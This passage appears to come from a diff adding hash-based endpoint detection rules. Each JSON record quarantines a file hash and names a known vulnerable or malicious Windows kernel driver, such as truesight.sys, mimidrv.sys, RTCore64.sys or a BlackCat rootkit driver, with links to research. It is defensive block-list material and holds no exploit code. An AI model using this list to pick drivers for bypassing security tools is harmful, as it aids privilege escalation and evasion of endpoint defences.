"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.825072Z", + "creation_date": "2026-03-23T11:45:30.825076Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.825085Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7da3710a0de72e7c493716a4a017703494dbb5f13799b53bf5c105850a840575", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a6b04357-8f15-5494-bf90-6b81d57d0ae3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.464788Z", + "creation_date": "2026-03-23T11:45:30.464791Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.464799Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0aab2deae90717a8876d46d257401d265cf90a5db4c57706e4003c19eee33550", + "comment": 
"Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a6b45b5c-1579-5fe1-97de-65978971e5ff", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.492144Z", + "creation_date": "2026-03-23T11:45:31.492146Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.492151Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4d49194d09db9c501d3b6d4f0b3a4703dfcfbde65038cbdb3c389e980114f1e6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a6bd9a47-cf8c-5369-b562-5e9ac79a86f5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:29.976245Z", + "creation_date": "2026-03-23T11:45:29.976247Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976253Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "42b22faa489b5de936db33f12184f6233198bdf851a18264d31210207827ba25", + "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a6d1cf8b-e188-51fd-9bf6-a160e27bfd0e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.469543Z", + "creation_date": "2026-03-23T11:45:30.469546Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.469555Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "14d8ec21cc6bad738a8eef146506d04c64282bce01d9659e7f4dcdbff95e4c34", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"a6da58d9-8184-5224-8fe8-0f654e48124d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811645Z", + "creation_date": "2026-03-23T11:45:31.811647Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811653Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a905284d68ba108446af0ea42c9a797dd8c2ba302b0ad89b2efc94a6b31029eb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a6e4547b-57ed-599e-bc88-ad766b5d8de9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827568Z", + "creation_date": "2026-03-23T11:45:31.827570Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.827576Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e71eb48affb34a84f6126ff828227a5e14d8cea137237b317c1f9069d7d4bb3d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a6e72e07-b5d2-58b5-bae0-515da98d8af5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.480842Z", + "creation_date": "2026-03-23T11:45:30.480846Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.480854Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "797c1f883d90d25e7fd553624bb16bfd5db24c2658aa0c3c51c715d5833c10fd", + "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a6f9eb61-4d85-5d5b-8701-20dcc5defc3b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985961Z", + "creation_date": "2026-03-23T11:45:29.985963Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985968Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7a84703552ae032a0d1699a081e422ed6c958bbe56d5b41839c8bfa6395bee1d", + "comment": "Malicious Kernel Driver related to RedDriver (aka telephonuAfY.sys, spwizimgVT.sys, 834761775.sys, reddriver.sys, typelibdE.sys, NlsLexicons0024UvN.sys and ktmutil7ODM.sys) [https://blog.talosintelligence.com/undocumented-reddriver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a7065736-c0bd-5429-b170-6c6c292bac30", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615099Z", + "creation_date": "2026-03-23T11:45:29.615101Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615108Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "18776682fcc0c6863147143759a8d4050a4115a8ede0136e49a7cf885c8a4805", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a709f252-8b8d-5957-87ae-683fb428ea13", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810291Z", + "creation_date": "2026-03-23T11:45:31.810293Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810299Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7ae9ab9a8092590c8413d4cff96fb5e78a0e6070432f0c103adeb01f39bcd8ed", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a70d178e-add3-55ad-be4e-ac75e0d28a55", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.461126Z", + "creation_date": "2026-03-23T11:45:30.461129Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.461138Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bbbeb5020b58e6942ec7dec0d1d518e95fc12ddae43f54ef0829d3393c6afd63", + "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a725f206-78df-5930-a437-624a4df1ffd8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.826991Z", + "creation_date": "2026-03-23T11:45:31.826993Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.826999Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8b1af547bbae57877b477886dd5b9d8aacbf529cba83270abe16c93d05b823c9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) 
AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a72d9bed-cf95-5fe0-9a47-97d9b9e094b4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.146831Z", + "creation_date": "2026-03-23T11:45:31.146833Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.146838Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bd6fa2dbddc71b076b718f6d1eb834e6562921a28eab26d9e36f555170688b75", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a737f5d9-0dcc-5a27-bbcb-d9429ed52dfd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:31.156500Z", + "creation_date": "2026-03-23T11:45:31.156502Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156508Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ec80b7453e9df01c251dea86942376db15570f0de1219a6bd04a3162599a967e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a7603904-18f0-51b7-9867-642994aebdf1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.824111Z", + "creation_date": "2026-03-23T11:45:31.824114Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.824122Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "69a48dd48d2e47a01261192b19aa99687d493e78357dac87830da7cc5f8df708", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + 
"source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a77296d0-3e6c-55b8-af7a-01e5fb885e37", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983334Z", + "creation_date": "2026-03-23T11:45:29.983336Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983342Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2b60228db4f3092063e115537b5731ef3487ecf55c036e812605c5149071332c", + "comment": "Vulnerable Kernel Driver (aka dcr.sys) [https://www.loldrivers.io/drivers/b1dd91b1-9ba3-4d68-a2d1-919039e18430/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a7742db5-a572-5441-8e43-f31456c7f420", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985557Z", + "creation_date": "2026-03-23T11:45:29.985559Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", 
+ "hl_testing_start_time": "2026-03-23T11:45:29.985565Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cb25a5125fb353496b59b910263209f273f3552d", + "comment": "Malicious BlackCat/ALPHV Ransomware Rootkit (aka fgme.sys, ktes.sys, kt2.sys and ktgn.sys) [https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html] [file SHA1]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a791ffd5-0b66-52ae-a465-090ac8ae6dd6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.981384Z", + "creation_date": "2026-03-23T11:45:29.981386Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.981392Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d2e843d9729da9b19d6085edf69b90b057c890a74142f5202707057ee9c0b568", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a79b2915-b4fd-534d-868f-bb6a4b70f332", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.457535Z", + "creation_date": "2026-03-23T11:45:30.457539Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.457547Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "442c18aeb09556bb779b21185c4f7e152b892410429c123c86fc209a802bff3c", + "comment": "Vulnerable Kernel Driver (aka rtkio64.sys ) [https://www.loldrivers.io/drivers/8d3f27bd-c3fd-48d0-913a-e2caa6fbd025/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a79e5c19-33bd-503c-b13c-b27330537098", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.459489Z", + "creation_date": "2026-03-23T11:45:30.459492Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.459501Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"62b14bb308c99132d90646e85bc7d6eb593f38e225c8232f69f24b74a019c176", + "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a7a17348-530a-5900-aa8a-6e6992c2412a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.146359Z", + "creation_date": "2026-03-23T11:45:32.146361Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146367Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ff5dbdcf6d7ae5d97b6f3ef412df0b977ba4a844c45b30ca78c0eeb2653d69a8", + "comment": "Vulnerable Kernel Driver (aka wsftprm.sys) [https://www.loldrivers.io/drivers/30e8d598-2c60-49e4-953b-a6f620da1371/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a7a80b46-d090-5deb-948b-cf031254524b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:32.144258Z", + "creation_date": "2026-03-23T11:45:32.144261Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.144267Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dee8dbe00a809e5ecdbea898393dd9ecd32fa0a0de80463cc2b903dcdec2cffe", + "comment": "Malicious Kernel Driver (aka idmtdi.sys) [https://www.loldrivers.io/drivers/c2e98102-2055-48f0-9449-3e7a7f2c0ffe/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a7b429bb-0cc9-5a12-b399-9a585519126c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.483275Z", + "creation_date": "2026-03-23T11:45:31.483279Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.483289Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d408df99fafdede69913c4f2067042c6c8b735f32c7d344f3f3e1228ce950bad", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a7b52ca2-95e0-59de-8335-0e5790af6c35", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827143Z", + "creation_date": "2026-03-23T11:45:30.827145Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827150Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "afd675062e521b9a03c4a9ba2007096355f38c6206f41861bd78e94e39b286cf", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka 